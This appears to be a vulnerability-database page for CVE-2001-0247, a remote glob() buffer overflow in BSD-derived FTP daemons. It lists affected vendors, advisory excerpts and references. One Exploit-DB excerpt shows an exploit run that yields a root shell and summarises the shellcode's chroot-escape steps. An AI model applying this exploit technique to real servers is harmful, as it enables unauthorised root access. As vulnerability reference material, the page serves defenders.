CVE-2001-0247
Published 2001-06-18
Priority P3 / 47 · critical · CVSS 2.0 score 10 · vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit available · EPSS 19.32% (97.0th percentile)
Buffer overflows in BSD-based FTP servers allow remote attackers to execute arbitrary commands via a long pattern string containing a {} sequence, as seen in (1) g_opendir, (2) g_lstat, (3) g_stat, and (4) the glob0 buffer as used in the glob functions glob2 and glob3.
Affected
51 ranges · showing 25 (no version range or fixed-in version is given for any entry)
| Vendor | Product | Entries shown | Version range | Fixed in |
|---|---|---|---|---|
| freebsd | freebsd | 18 | — | — |
| mit | kerberos_5 | 4 | — | — |
| netbsd | netbsd | 3 | — | — |
No detection rules found.
Exploit-DB: FreeBSD 4.2-stable - FTPd 'glob()' Remote Buffer Overflow (exploitdb, 2001-04-16)
source: https://www.securityfocus.com/bid/2548/info
The BSD ftp daemon and derivatives (such as IRIX ftpd or the ftp daemon shipped with Kerberos 5) contain a number of buffer overflows that may lead to a compromise of root access to malicious users.
During parsing operations, the ftp daemon assumes that there can never be more than 512 bytes of user-supplied data. This is because that is usually how much data is read from a socket. Because of this assumption, certain memory copy operations involving user data lack bounds checking.
It is possible for users to use metacharacters to expand file/path names through interpretation by glob() and exploit these overflowable conditions. In order to do so, the attacker's ftp account
Exploit-DB: OpenBSD 2.x < 2.8 FTPd - 'glob()' Remote Buffer Overflow (exploitdb, 2001-04-16)
Session transcript from the exploit header:

```text
ftp> pwd
257 "/test" is current directory.
ftp> dir
229 Entering Extended Passive Mode (|||12574|)
150 Opening ASCII mode data connection for '/bin/ls'.
total 2
drwxr-xr-x 2 1000 0 512 Apr 14 14:14 12345678901234567
226 Transfer complete.
.....
$ ./leheehel -c /test -l 17 -s0xdfbeb970 localhost
// 230 Guest login ok, access restrictions apply.
// 250 CWD command successful.
retaddr = dfbeb970
Press enter..
remember to remove the "adfa"-dir
id
uid=0(root) gid=32766(nogroup) groups=32766(nogroup)
```
The shellcode basically does:
seteuid(0); a = open("..", O_RDONLY); mkdir("adfa", 555);
chroot("adfa"); fchdir(a); for(cnt = 100; cnt; cnt--)
chdir("..");
chroot(".."); execve("/bin//sh", ..);
Credits:
COVERT for their advisory.
The OpenBSD devteam for a great OS.
beercan for letting me test
Exploit-DB: FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Remote Buffer Overflow (exploitdb, 2001-04-14)
source: https://www.securityfocus.com/bid/2548/info
The BSD ftp daemon and derivatives (such as IRIX ftpd or the ftp daemon shipped with Kerberos 5) contain a number of buffer overflows that may lead to a compromise of root access to malicious users.
During parsing operations, the ftp daemon assumes that there can never be more than 512 bytes of user-supplied data. This is because that is usually how much data is read from a socket. Because of this assumption, certain memory copy operations involving user data lack bounds checking.
It is possible for users to use metacharacters to expand file/path names through interpretation by glob() and exploit these overflowable conditions. In order to do
No writeups or analysis indexed.
References:
- ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-018.txt.asc
- ftp://patches.sgi.com/support/free/security/advisories/20010802-01-P
- http://archives.neohapsis.com/archives/freebsd/2001-04/0466.html
- http://www.cert.org/advisories/CA-2001-07.html
- http://www.nai.com/research/covert/advisories/048.asp
- http://www.securityfocus.com/bid/2548
- https://exchange.xforce.ibmcloud.com/vulnerabilities/6332